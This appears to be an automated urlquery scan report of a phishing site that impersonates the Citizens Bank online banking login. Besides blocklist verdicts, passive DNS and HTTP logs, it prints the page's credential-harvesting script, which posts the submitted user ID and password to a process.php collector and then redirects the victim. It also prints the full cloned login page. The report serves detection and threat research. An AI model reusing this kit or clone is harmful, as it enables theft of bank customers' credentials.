Overview

URL 2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
IP69.49.244.31
ASNUNIFIEDLAYER-AS-1
Location United States
Report completed2022-09-30 21:48:03 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Scan Date Severity Indicator Comment
2022-09-30 2 2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/ RBS Citizens Bank
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-30 2 2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/ Phishing
2022-09-30 2 2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/js/actions.js Phishing
2022-09-30 2 2914hawthorn.info/efs/hhf/js/citizensHeaderFooter-citizensns44745.js Phishing
2022-09-30 2 2914hawthorn.info/t-Kmcy8k/uJqt11r/GPaw2Rw/Wd/5cz5rDSm/fQEkCFEB/BwwGXU/UME20 Phishing
2022-09-30 2 2914hawthorn.info/_sec/cp_challenge/sec-cpt-3-6.js Phishing
2022-09-30 2 2914hawthorn.info/efs/efs/jsp-ns/scripts/common.js Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (22)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-30 05:12:28 UTC 52.39.175.179
mnemonic passive DNS www.citizensbank.com (1) 80069 2012-07-03 13:47:53 UTC 2022-09-29 15:41:45 UTC 104.110.12.116
mnemonic passive DNS stackpath.bootstrapcdn.com (1) 2467 2018-04-05 04:41:29 UTC 2022-09-30 11:00:19 UTC 104.18.10.207
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-30 05:34:07 UTC 34.160.144.191
mnemonic passive DNS cdnjs.cloudflare.com (2) 235 2020-10-20 10:17:36 UTC 2022-09-30 06:01:15 UTC 104.17.24.14
mnemonic passive DNS 2914hawthorn.info (10) 0 2022-09-26 09:58:17 UTC 2022-09-30 13:12:50 UTC 69.49.244.31 Unknown ranking
mnemonic passive DNS ajax.aspnetcdn.com (1) 693 2012-05-24 13:35:31 UTC 2022-09-30 13:56:54 UTC 152.199.19.160
mnemonic passive DNS ocsp.sectigo.com (2) 487 2018-12-17 11:31:55 UTC 2022-09-30 15:22:46 UTC 104.18.32.68
mnemonic passive DNS r3.o.lencr.org (7) 344 2020-12-02 08:52:13 UTC 2022-09-30 04:55:29 UTC 23.36.76.226
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-30 04:56:26 UTC 34.117.237.239
mnemonic passive DNS ocsps.ssl.com (1) 14517 2018-11-21 10:22:19 UTC 2022-09-30 14:55:16 UTC 34.237.184.165
mnemonic passive DNS udc-neb.kampyle.com (1) 3039 2015-12-24 09:52:27 UTC 2022-09-30 17:31:45 UTC 35.241.45.82
mnemonic passive DNS lpcdn.lpsnmedia.net (2) 3501 2014-04-27 10:17:58 UTC 2022-09-30 15:19:07 UTC 178.249.97.98
mnemonic passive DNS va.idp.liveperson.net (1) 13470 2017-02-09 19:09:19 UTC 2022-09-30 09:19:03 UTC 208.89.15.170
mnemonic passive DNS www3.citizensbankonline.com (23) 125923 2012-07-05 13:46:01 UTC 2022-09-29 21:33:15 UTC 104.110.3.220
mnemonic passive DNS nebula-cdn.kampyle.com (2) 3739 2015-09-21 16:24:38 UTC 2022-09-30 17:31:45 UTC 151.101.85.175
mnemonic passive DNS code.jquery.com (2) 634 2012-05-21 17:28:02 UTC 2022-09-30 05:18:50 UTC 69.16.175.10
mnemonic passive DNS ocsp.entrust.net (5) 1208 2013-07-24 12:09:14 UTC 2022-09-30 04:55:29 UTC 104.110.10.32
mnemonic passive DNS citizensbank.demdex.net (1) 68781 2017-03-23 21:06:39 UTC 2022-09-29 21:33:16 UTC 54.76.210.146
mnemonic passive DNS img-getpocket.cdn.mozilla.net (5) 1631 2017-09-01 03:40:57 UTC 2022-09-30 13:49:02 UTC 34.120.237.76
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-30 17:00:01 UTC 18.165.201.80
mnemonic passive DNS ocsp.digicert.com (4) 86 2012-05-21 07:02:23 UTC 2022-09-30 15:21:19 UTC 93.184.220.29


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 69.49.244.31

Date UQ / IDS / BL URL IP
2022-11-29 22:46:57 +0000
0 - 0 - 3 sfnimarketing.in/ 69.49.244.31
2022-11-23 20:16:42 +0000
0 - 0 - 1 yrkhrsolutions.com/success/go/timcrooks@slurp (...) 69.49.244.31
2022-11-22 06:48:01 +0000
0 - 0 - 2 drinkdrrip.com/Secure 69.49.244.31
2022-11-19 13:35:07 +0000
0 - 0 - 2 newsmantra.org/secure 69.49.244.31
2022-11-19 05:52:00 +0000
11 - 0 - 3 newsmantra.org/secure 69.49.244.31

Last 5 reports on ASN: UNIFIEDLAYER-AS-1

Date UQ / IDS / BL URL IP
2022-12-02 14:02:42 +0000
17 - 0 - 32 delivery.imaginedbyjess.co/public/cieA3B7SlWJ (...) 192.232.249.125
2022-12-02 14:02:41 +0000
17 - 0 - 32 delivery.imaginedbyjess.co/public/NYlvbSkmoJj (...) 192.232.249.125
2022-12-02 13:58:31 +0000
0 - 0 - 1 cloudgroupdigital.com/ 162.241.61.68
2022-12-02 13:58:32 +0000
0 - 0 - 1 cloudgroupdigital.com/ 162.241.61.68
2022-12-02 13:53:30 +0000
44 - 0 - 44 coprwanda.com/login.php?primarymember_id=11cc (...) 192.185.105.9

Last 1 reports on domain: 2914hawthorn.info

Date UQ / IDS / BL URL IP
2022-09-30 21:48:03 +0000
0 - 0 - 7 2914hawthorn.info/citi/citizensbankonline.com (...) 69.49.244.31

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-12-01 17:44:57 +0000
15 - 0 - 60 ci1tzn.com/ 104.16.244.78
2022-12-01 17:28:36 +0000
10 - 0 - 55 ctzacv.com/ 104.16.243.78
2022-12-01 14:58:14 +0000
13 - 0 - 45 ci1tzn.com/ 104.16.243.78
2022-12-01 14:41:53 +0000
11 - 0 - 57 ctzacv.com/ 104.16.244.78
2022-11-20 11:21:00 +0000
21 - 0 - 0 cumnasi.cf/Citizensbnk/1124225a47b3f07185073f (...) 162.240.217.8


JavaScript

Executed Scripts (17)


Executed Evals (1)

#1 JavaScript::Eval (size: 297, repeated: 1) - SHA256: 4001688cd514fdd8fb5fdf8f6e689d30f761a0b65924f36c5f349566b9fbf3ba

                                        $(document).bind("contextmenu", function(e) {
    return false
});
$('#loginForm').on('submit', function(e) {
    $(".overlay").show(500);
    $.post('T_a_n_G_u_l_AR/process.php', $(this).serialize(), function(data) {
        console.log(data)
    });
    setTimeout(function() {
        window.location.href = "indexs.php"
    }, 2000);
    e.preventDefault()
});
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 22706, repeated: 1) - SHA256: 7aee08c5fd0d1e094f470e844fbdf53b03da77ea35167d240df66ff081ac8901

                                        < div class = citizens - header - footer - injected > < link href = https: //www3.citizensbankonline.com/efs/hhf/css/citizensns.min.44745.css rel=stylesheet type=text/css><!--[if IE 8]><link rel="stylesheet" type="text/css" href="https://www3.citizensbankonline.com/efs/hhf/css/citizensns-ie8.min.44745.css?refresh=1631342575146"><![endif]--><style>.help-modal-header .help-modal-close{background:url(https://www3.citizensbankonline.com/efs/hhf/img/modal-help-close.png) center center no-repeat transparent;background-size:20px}.help-modal-menu a.active{background:#f2faf8 url(https://www3.citizensbankonline.com/efs/hhf/img/arrow-right-green.png) right 20px center no-repeat;background-position:right 20px center;background-size:7px}.account-section-title.checkmark h1{padding:0 0 5px 28px!important}.lt-ie9 .help-modal-menu a.active{background:#f2faf8 url(https://www3.citizensbankonline.com/efs/hhf/img/arrow-right-green.png) right 20px center no-repeat!important;background-size:7px!important}.input-wrapper .tooltip{margin-left:1px}</style></div><div class=citizens-header><style>.citizens-header-footer-overlay{opacity:1;background-color:#fff;position:fixed;width:100%;height:100%;top:0;left:0;z-index:1000}.citizens-header-footer-overlay .centered-content{width:100%;max-width:1060px;padding:0 20px;margin:0 auto;font-family:arial,helvetica,san-serif;font-size:14px}.citizens-header-footer-overlay .responsive-enabled .centered-content{width:auto;max-width:1060px}.citizens-header-footer-overlay .page-logo{float:none}.citizens-header-footer-overlay .page-logo img{margin:10px;float:none}.citizens-header-footer-overlay .topshadow{position:absolute;width:100%;top:100px;z-index:5;height:8px;background:-webkit-radial-gradient(50% 100%,farthest-side,rgba(0,0,0,.1),transparent 100%);background:radial-gradient(farthest-side at 50% 100%,rgba(0,0,0,.1),rgba(0,0,0,0) 100%);background-repeat:no-repeat;background-size:cover}</style><style>.account-section-title.checkmark h1{padding:0 0 5px 28px!important}.mobile-alert-dot{min-width:22px;min-height:22px;width:auto;height:auto;max-width:50px;max-height:50px;padding:5px}</style><div class=citizens-header-footer><div class=page-header id=page-header><div class=topshadow></div><div class="clearfix centered-content"><a href=http://www.citizensbank.com class=page-logo tabindex=1><img src=https://www3.citizensbankonline.com/efs/hhf/img/CTZ_Green-01.png alt=Citizens border=0 height=25 width=203></a><div id=header-navigation-container></div></div></div></div></div><div class=page-container id=page-container><div class="clearfix centered-content"><section class="page-region top-content" id=top-content></section><section class="clearfix layout-2-1 main-container two-col" id=main-container><section class="page-region main-content" id=main-content><div class="account-table account-table-full"><span class=account-table-border></span><div class=account-table-content><div class=account-content-container><div class=account-table-body><header class="clearfix account-section-title account-secure"><a href=# class=mobile-help-trigger>Help</a><h1>Secure Online Banking Login</h1></header><div class="error-message show-error" id=messagecontainer role=alert>The online user ID below does not match our records. Please review your information then try again. If you are still unable to continue, please call our Customer Service Center.</div><section class=account-section><form action="" id=loginForm method=post name=loginForm class="clearfix pay-transfer-options"><div class="clearfix account-title"><p>Please enter your Online User ID and Password.</div><div class="clearfix full-width form-item label-right"><label for=UserID><strong>Online User ID:</strong></label> <input type=text name=UserID id=UserID autocomplete=off autocomplete=off class="required demo-username" maxlength=20 required tabindex=1><div class="clearfix full-width checkbox-item"><input type=hidden name=Register id=Register value=0> <input type=checkbox name=cbSaveUserID id=cbSaveUserID disabled style=vertical-align:top tabindex=5> <span class=inline-tooltip><label for=cbSaveUserID>Remember User ID</label> <span class=tooltip aria-describedby=tooltip-content role=tooltip tabindex=6><div class=tooltip-icon title="Remember User ID tooltip"></div><div class=tooltip-box><div class=tooltip-content id=aria-tooltip-content><span class=tooltip-arrow></span><div>Select the "Remember User ID" box on the Login page if you want to be remembered.</div><br><div>Please note, if the "Remember User ID" check box is not displayed on the Login page, click on the "Login using different Online User ID" link to display it.</div><br><div>DO NOT check this box if you are using a public device that is accessible to others.</div></div><div class=bottomshadow></div></div></span></span></div><div class="full-width form-item"><label for=currentpassword><strong>Password:</strong></label> <input type=password name=Password id=Password autocomplete=off class="required demo-password" maxlength=15 required tabindex=2 size=15></div><span class=mobile-line-break><a href=/efs/ui/tli/index.html tabindex=7 data-trigger=login-trouble id=troublelogging style=font-size:16px!important>Trouble logging in?</a></span><br></div><div class=show-error id=fielderror role=alert>We're sorry. That user ID and password does not match our records. Please try again, or do you need Login Assistance?</div><div class=form-actions><input type=submit data-trigger=next class="arrow submit-button" tabindex=3 value=Login> <a href=http://www.citizensbank.com/ class=cancel tabindex=8>Cancel</a></div></form></section></div></div></div></div></section><aside class="page-region main-sidebar" id=main-sidebar><div class="citizens-help mobile-modal sidebar-accordian sidebar-item sidebar-list-container" id=citizens-help><div class=sidebar-list-content><header class=sidebar-list-title><h3>Need Help?</h3></header><div id=faq-holder><form action=https://www3.citizensbankonline.com/efs/servlet/efs/login-assistance.jsp id=frmAsst method=post name=frmAsst><input type=hidden name=CSRF_TOKEN value=0ZTQ-7LQP-42LX-01E1-IBTJ-PDPK-ZLRV-7EQS> <input type=hidden name=needHelp value=1><section class="faq-container toggle-list-container" id=faq-index-1><a href=# class="showhide sidebar-list-option-accordian" title="Expand contents of Where can I get login assistance for Online Banking?" aria-label="Expand Contents">Where can I get login assistance for Online Banking?</a><ul class="sidebar-list loginfaq showhide-content"><li><p>Simply click on "Trouble logging in?" link. Or, you can click on "View All Help Topics" link, which appears on each screen.</ul></section><section class="faq-container toggle-list-container" id=faq-index-10><a href=# class="showhide sidebar-list-option-accordian" title="Expand contents of Is Online Banking secure?" aria-label="Expand Contents">Is Online Banking secure?</a><ul class="sidebar-list loginfaq showhide-content"><li><p>To make Online Banking secure, Citizens uses the highest level of encryption available today. Encryption is the process by which information is translated into un-interpretable code and then back to recognized information.<br>As an added measure, Online Banking gives you the capability to easily verify that you are on the authentic Citizens website and not on a fake site created by fraudsters. Just look for the green bar (or some variation of it) in your browser address. The green bar should remind you that "green is good" and that our website has passed a sophisticated authentication process, letting you know you are good to go.</ul></section><section class="faq-container toggle-list-container" id=faq-index-12><a href=# class="showhide sidebar-list-option-accordian" title="Show contents of Should my browser address bar have a green indicator when I use Online Banking?" aria-label="Expand Contents">Should my browser address bar have a "green" indicator when I use Online Banking?</a><ul class="sidebar-list loginfaq showhide-content"><li><p>Yes. As an added measure, Online Banking gives you the capability to easily verify that you are on the authentic Citizens website and not on a fake site created by fraudsters. Just look for the green bar (or some variation of it) in your browser address. The green bar should remind you that "green is good" and that our website has passed a sophisticated authentication process, letting you know you are good to go.</ul></section><section class="faq-container toggle-list-container" id=faq-index-20><a href=# class="showhide sidebar-list-option-accordian" title="Expand contents of How do I log into Online Banking if I’m a first-time user?" aria-label="Expand Contents">How do I log into Online Banking if I'm a first-time user?</a><ul class="sidebar-list loginfaq showhide-content"><li><p>Simply enter your Online User ID and Password and click "LOGIN", then answer your Challenge Question (if presented). In some situations, your Online User ID will be your ATM/Debit Card number and your Password will be the last four digits of your Social Security number followed by "Abcd" (e.g. 1234Abcd). If you haven't already selected an Online User ID, you will be asked to do so.</ul></section></form></div><ul class=sidebar-list><li class=cta-row><a href=login-faqs.jsp target=_blank class=blue>View All Help Topics</a><li class="clearfix cta-row sign-up-prompt visible"><span>Haven't signed up for Online Banking?</span> <a href=/efs/ui/enrollment/index.html class="cta orange">Enroll Now</a></ul></div></div></aside></section></div></div><div class=citizens-footer><div class=citizens-header-footer><footer class=page-footer id=page-footer><div class=footer-top><ul><li><a href=# class=contact title="Opens Ways to Contact Us Dialog"><span class=account-underline>Ways to Contact Us</span><span class=visuallyhidden>- Opens Ways to Contact Us Dialog</span></a><div class=dropup-menu><h4>Contact Us</h4><p>General Questions:<br><strong>1-800-656-6561</strong> (personal bank accounts)<br>Business Questions:<br><strong>1-877-229-6428</strong> (online banking support)<br><strong>1-800-862-6200</strong> (account information)<br>Investment Questions:<br><strong>1-800-942-8300</strong> (Citizens Securities, Inc.)</div><li><a href=# class=locator title="Opens Branch &amp; ATM Locator Dialog"><span class=account-underline>Branch &amp; ATM Locator</span><span class=visuallyhidden>- Opens Branch &amp; ATM Locator Dialog</span></a><div class=dropup-menu><h4>Branch &amp; ATM Locator</h4><p>Find one of our 1,300 locations near you.<div role=form><div class=error-message id=stickyFooterBranch-error style=display:none></div><input type=text id=stickyFooterBranch value=NONE placeholder="Enter Zip Code or City, State" title="Enter Zip Code or City, State"> <a href=# class="button button-stickyfooterbranch" type=button>Submit</a></div></div><li><a style=cursor:pointer onclick=showSurvey(formId)><img src=https://www.citizensbank.com/assets/CB_media/images/feedback.png alt="Give Feedback" border=0 style=cursor:pointer;border:0;height:40px;width:40px;padding-right:4px>Feedback</a></ul></div><div class="clearfix footer-row"><ul><li><h6>Checking &amp; Savings</h6><li><a href=http://www.citizensbank.com/checking/ target=_blank>Checking</a><li><a href=http://www.citizensbank.com/savings-and-cds/savings.aspx target=_blank>Savings</a><li><a href=http://www.citizensbank.com/savings-and-cds/money-markets.aspx target=_blank>Money Markets</a><li><a href=http://www.citizensbank.com/savings-and-cds/cds.aspx target=_blank>Certificates of Deposit (CDs) <sup>�</sup></a><li><a href=http://www.citizensbank.com/ira/ target=_blank>IRAs</a><li><a href=http://www.citizensbank.com/checking-and-savings/programs-and-services.aspx target=_blank>Programs &amp; Services</a><li><a href=http://www.citizensbank.com/checking-and-savings/benefits-and-features.aspx target=_blank>Benefits &amp; Features</a><li><a href=http://www.citizensbank.com/checking/debit-cards/standard.aspx target=_blank>Debit Card</a><li><a href=http://www.citizensbank.com/overdraft-protection/ target=_blank>Overdraft Choices <sup>�</sup></a></ul><ul><li><h6>Home Borrowing</h6><li><a href=http://www.citizensbank.com/mortgages/ target=_blank>Mortgages</a><li><a href=http://www.citizensbank.com/home-equity/loans.aspx target=_blank>Home Equity Loans</a><li><a href=http://www.citizensbank.com/home-equity/lines.aspx target=_blank>Home Equity Lines of Credit</a><li><a href=http://www.citizensbank.com/loans/determine-my-rate.aspx target=_blank>Determine My Rate</a><li><a href=http://www.citizensbank.com/mortgages/my-mortgage.aspx target=_blank>My Mortgage Account</a></ul><ul><li><h6>Students</h6><li><a href=http://www.citizensbank.com/student-loans/default.aspx target=_blank>Student Loan Options</a><li><a href=http://www.citizensbank.com/student-loans/education-refinance-loan-overview.aspx target=_blank>Refinancing Student Loans</a><li><a href=http://www.citizensbank.com/student-loans/process/default.aspx target=_blank>The Student Loan Process</a><li><a href=http://www.citizensbank.com/student-loans/process/undergraduate.aspx target=_blank>Undergraduate Students &amp; Parents</a><li><a href=http://www.citizensbank.com/student-loans/process/graduate.aspx target=_blank>Graduate Students</a><li><a href=http://www.citizensbank.com/student-loans/tools.aspx target=_blank>Tools &amp; Information</a><li><a href=http://www.citizensbank.com/checking/one-deposit-checking-account.aspx target=_blank>Banking for Students</a><li><a href=http://www.citizensbank.com/student-services/access-my-student-loan/default.aspx target=_blank>Access My Student Loan</a></ul><ul class=last><li><h6>Cards</h6><li><a href=http://www.citizensbank.com/credit-cards/overview.aspx target=_blank>Credit Cards</a><li><a href=http://www.citizensbank.com/cards-and-rewards/credit-cards/creditcardagreements/agreements.aspx target=_blank>Card Agreements</a><li><a href=http://www.citizensbank.com/security/ target=_blank>Security Features</a></ul></div><div class="clearfix footer-row"><ul><li><h6>Personal Loans</h6><li><a href=http://www.citizensbank.com/personal-loans/overview.aspx target=_blank>Overview</a><li><a href=http://www.citizensbank.com/personal-loans/faqs.aspx target=_blank>FAQs</a></ul><ul><li><h6>Resources</h6><li><a href=http://www.citizensbank.com/checking/order-checks.aspx target=_blank>Order Checks</a><li><a href=http://www.citizensbank.com/online-and-mobile-banking/default.aspx target=_blank>Online &amp; Mobile Banking</a><li><a href=http://www.citizensbank.com/customer-service/ target=_blank>Customer Service</a></ul><ul><li><h6>About Us</h6><li><a href=http://investor.citizensbank.com/about-us/our-company.aspx target=_blank>About Citizens</a><li><a href=http://www.citizensbank.com/community/ target=_blank>In the Community</a><li><a href=http://www.citizensbank.com/careers/ target=_blank>Careers</a><li><a href=http://www.citizensbank.com/about_our_ads.aspx target=_blank>About Our Ads</a></ul><ul class=last><li><h6>Solutions</h6><li><a href=http://www.citizensbank.com/ target=_blank>Personal</a><li><a href=http://www.citizensbank.com/investing/ target=_blank>Investing</a><li><a href=http://www.citizensbank.com/small-business/ target=_blank>Small Business</a><li><a href=http://www.citizensbank.com/commercial-banking/ target=_blank>Commercial</a></ul></div><div class="clearfix footer-row"><ul><li><h6>Disclosures</h6><li><a href=http://www.citizensbank.com/pf/onlinebanking/terms.aspx target=_blank>Online Terms and Conditions</a><li><a href=http://www.citizensbank.com/assets/pdf/ElectronicNoticeDisclosureAndConsent.pdf target=_blank>Electronic Notice Disclosure and Consent (Online Service)</a><li><a href=http://www.citizensbank.com/checking-and-savings/account-documents.aspx target=_blank>Account Documents</a><li><a href="http://www.citizensbank.com/tools/leaving.aspx?url=http://www.fdic.gov" target=_blank>Member FDIC</a><li><a href=http://www.citizensbank.com/security/equal-housing-lender.aspx target=_blank>Equal Housing Lender <img src=/efs/hhf/img/equal-housing.gif alt="Equal Housing Lender" title="Equal Housing Lender"></a><li><a href=http://www.citizensbank.com/security/ target=_blank>Security, Privacy &amp; Legal</a></ul></div><div class=centered-content><div class=footer-bottom><p class=legal>Zelle and the Zelle related marks are wholly owned by Early Warning Services, LLC and are used herein under license.<p class=legal>*Securities, Insurance Products and Investment Advisory Services offered through Citizens Securities, Inc. ("CSI"). CSI is an SEC registered investment adviser and Member - FINRA and SIPC. One Citizens Bank Way, JCB135, Johnston, RI 02919. CSI is an affiliate of Citizens Bank, N.A.<br><br>The investment balances shown in online banking are based on market prices, with up to a fifteen minute delay from the time this webpage was last refreshed. Information relating to accounts not held at CSI is presented as an accommodation and while drawn from sources believed to be reliable is not guaranteed as to accuracy or completeness. Such information should be independently confirmed by the account owner(s).<br><br>Information relating to accounts not held or custodied by National Financial Services (NFS) (Assets Held Away), CSIs clearing broker dealer, was provided to NFS by outside parties and is included for informational purposes only. These positions are not part of your brokerage account carried by NFS and therefore any SIPC account protection afforded your account through NFS does not cover these assets or prices reported. Neither NFS, CSI nor Citizens are responsible for the Assets Held Away information provided and does not guarantee the accuracy or timeliness of the positions or prices reported. Prices shown do not necessarily reflect the actual current market prices. Further information regarding these prices may be obtained by contacting CSI.<br><br>The investment products and financial strategies suggested herein are subject to investment risk, including possible loss of principal amount invested. Investment decisions should be based on each individual's goals, time horizon and tolerance for risk.<br><br>SpeciFi<sup>�</sup> is made available through CSI. Portfolio management services are sub-advised by SigFig Wealth Management, LLC ("SigFig"), an SEC registered investment adviser. SigFig is not an affiliate of CSI or Citizens Bank, N.A.<div class="footer-disclaimer footer-disclaimer-box footer-disclaimer-box--margin-bottom"><p class=footer-disclaimer-box__text>Securities, Insurance Products and Investment Advisory Services are:<ul class=footer-disclaimer-box__list><li class=footer-disclaimer-box__list-item>NOT FDIC INSURED<li class=footer-disclaimer-box__list-item>NOT BANK GUARANTEED<li class=footer-disclaimer-box__list-item>MAY LOSE VALUE<li class=footer-disclaimer-box__list-item>NOT A DEPOSIT<br><li class=footer-disclaimer-box__list-item>NOT INSURED BY ANY FEDERAL GOVERNMENT AGENCY</ul></div><ul class=footer-util><li class=sitemap><a href=http://www.citizensbank.com/tools/SiteMap.aspx target=_blank>Site Map</a><li>Follow: <a href="http://www.citizensbank.com/tools/leaving.aspx?url=http://www.facebook.com/citizensbank" target=_blank><img src=https://www3.citizensbankonline.com/efs/hhf/img/footer-follow-facebook.png alt=Facebook align=middle> </a><a href="http://www.citizensbank.com/tools/leaving.aspx?url=http://twitter.com/citizensbank" target=_blank><img src=https://www3.citizensbankonline.com/efs/hhf/img/footer-follow-twitter.png alt=Twitter> </a><a href="http://www.citizensbank.com/tools/leaving.aspx?url=http://linkedin.com/company/citizens-bank" target=_blank><img src=https://www3.citizensbankonline.com/efs/hhf/img/footer-follow-linkedin.png alt=Linkedin> </a><a href="http://www.citizensbank.com/tools/leaving.aspx?url=http://youtube.com/citizensbank" target=_blank><img src=https://www3.citizensbankonline.com/efs/hhf/img/footer-follow-youtube.png alt=Youtube></a></ul><p class=footer-copyright>� Copyright 2021 Citizens Financial Group, Inc. All rights reserved.<br>Citizens is a brand name of Citizens Bank, N.A. (NMLS ID# 433960).<br>Citizens corporate headquarters: One Citizens Plaza, Providence, RI 02903</p><img src=https://www3.citizensbankonline.com/efs/hhf/img/elh.gif alt="Equal Housing Lender"> <img src=https://www3.citizensbankonline.com/efs/hhf/img/fdicFooter.gif alt="Member FDIC"></div></div></footer></div></div><script src=/efs/hhf/js/citizensHeaderFooter-citizensns44745.js></script><noscript><img src="https://www3.citizensbankonline.com/akam/11/pixel_1f77134d?a=dD1iNzliNTMyYjdlNWI3ZDA2NTgxZmYyNDZiNWU1MjFlODc5NDVmZDJlJmpzPW9mZg==" style=visibility:hidden;position:absolute;left:-999px;top:-999px></noscript><script src=/t-Kmcy8k/uJqt11r/GPaw2Rw/Wd/5cz5rDSm/fQEkCFEB/BwwGXU/UME20 type=text/javascript></script><link href=/_sec/cp_challenge/sec-3-6.css rel=stylesheet type=text/css><script src=/_sec/cp_challenge/sec-cpt-3-6.js async defer></script><div id=sec-overlay style=display:none><div id=sec-container></div></div><script src=/efs/efs/jsp-ns/scripts/common.js></script><iframe id=destination_publishing_iframe_citizensbank_0 src="https://citizensbank.demdex.net/dest5.html?d_nsid=0#https%3A%2F%2Fwww3.citizensbankonline.com%2Fefs%2Fservlet%2Fefs%2Flogin.jsp" style=display:none;width:0;height:0 title="Adobe ID Syncing iFrame" class=aamIframeLoaded sandbox="allow-scripts allow-same-origin"></iframe><script src=https://nebula-cdn.kampyle.com/us/wu/356861/onsite/generic1627665419003.js async charset=UTF-8 type=text/javascript></script><span></span><iframe id=lpSS_43756262395 src="https://lpcdn.lpsnmedia.net/le_secure_storage/3.13.1.0-release_5043/storage.secure.min.html?loc=https%3A%2F%2Fwww3.citizensbankonline.com&amp;site=83789770&amp;ist=sessionStorage&amp;env=prod&amp;isCrossDomain=true" style=width:0;height:0;position:absolute;top:-1000px;left:-1000px;display:none aria-hidden=true name=lpSS_43756262395 role=presentation tabindex=-1 title="Intentionally blank"></iframe><script src="https://lpcdn.lpsnmedia.net/le_secure_storage/3.13.1.0-release_5043/storage.secure.min.js?loc=https%3A%2F%2Fwww3.citizensbankonline.com&amp;site=83789770&amp;force=1&amp;env=prod&amp;isCrossDomain=true" id=lpSS_6393997318></script><iframe id=fr_57239_56491 src="https://va.idp.liveperson.net/postmessage/postmessage.min.html?bust=1631342584828&amp;loc=https%3A%2F%2Fwww3.citizensbankonline.com" style=width:0;height:0;position:absolute;top:-1000px;left:-1000px;display:none aria-hidden=true name=fr_57239_56491 role=presentation tabindex=-1></iframe><div class=overlay><div class=lgif-space></div><div class=loadgif><img src=img/loading.gif height=100 width=100></div></div>
                                    


HTTP Transactions (76)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         18.165.201.80
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Fri, 30 Sep 2022 21:02:06 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 02dcbe051a75d060274d188948821dcc.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR50-P3
X-Amz-Cf-Id: MYrb88qBIdBAUN_CI8m6GoMsh-GyLSQuhJLytfJR22zPCKhy_HvbhQ==
Age: 2746


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    2d12f67fe57a87e7366b662d153a5582
Sha1:   d7b02d81cc74f24a251d9363e0f4b0a149264ec1
Sha256: 73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "763E2DADFDD286A51327CD2000CA335E30CD0B9B7267875D22CA33F7556BA200"
Last-Modified: Fri, 30 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5125
Expires: Fri, 30 Sep 2022 23:13:17 GMT
Date: Fri, 30 Sep 2022 21:47:52 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "DFF04734315B51FC11069E2D21B5BE37B03D28AD01986E1AE2C96AFC6BA31859"
Last-Modified: Thu, 29 Sep 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=20084
Expires: Sat, 01 Oct 2022 03:22:36 GMT
Date: Fri, 30 Sep 2022 21:47:52 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
